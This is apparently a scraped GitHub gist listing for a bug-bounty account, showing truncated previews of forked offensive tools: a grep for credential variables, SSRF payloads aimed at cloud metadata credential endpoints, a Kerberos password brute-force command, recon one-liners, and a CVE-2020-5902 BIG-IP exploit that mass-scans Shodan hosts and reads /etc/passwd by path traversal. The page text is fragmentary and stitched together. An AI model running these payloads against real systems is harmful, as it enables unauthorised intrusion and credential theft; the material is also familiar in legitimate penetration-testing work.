cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txtcmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
Never Mind secfb
secfb
/ subdomain_wordlist.md
Created
August 8, 2020 14:18
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
secfb
/ resources.md
Created
August 3, 2020 11:11
— forked from muff-in/resources.md
secfb
/ secrets.sh
Created
July 26, 2020 15:19
— forked from nullenc0de/secrets.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU |
secfb
/ content-types.txt
Created
July 26, 2020 15:16
— forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types | |
| application/1d-interleaved-parityfec | |
| application/3gpdash-qoe-report+xml | |
| application/3gpp-ims+xml | |
| application/a2l | |
| application/activemessage | |
| application/alto-costmap+json | |
| application/alto-costmapfilter+json | |
| application/alto-directory+json |
secfb
/ cloud_metadata.txt
Created
July 26, 2020 15:15
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
secfb
/ Unique wayback url
Created
July 26, 2020 10:26
— forked from dubey-amit/Unique wayback url
Get all the Wayback endpoints to compare it with your Burp crawled URLs & probe all the unique endpoints.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200 |
secfb
/ kerberos_attacks_cheatsheet.md
Created
July 18, 2020 23:19
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
secfb
/ CVE-2020-5902.md
Created
July 7, 2020 08:39
— forked from cihanmehmet/CVE-2020-5902.md
BIGIP CVE-2020-5902 Exploit POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| undefined | |
| undef | |
| null | |
| NULL | |
| (null) | |
| nil | |
| NIL | |
| true | |
| false | |
| True |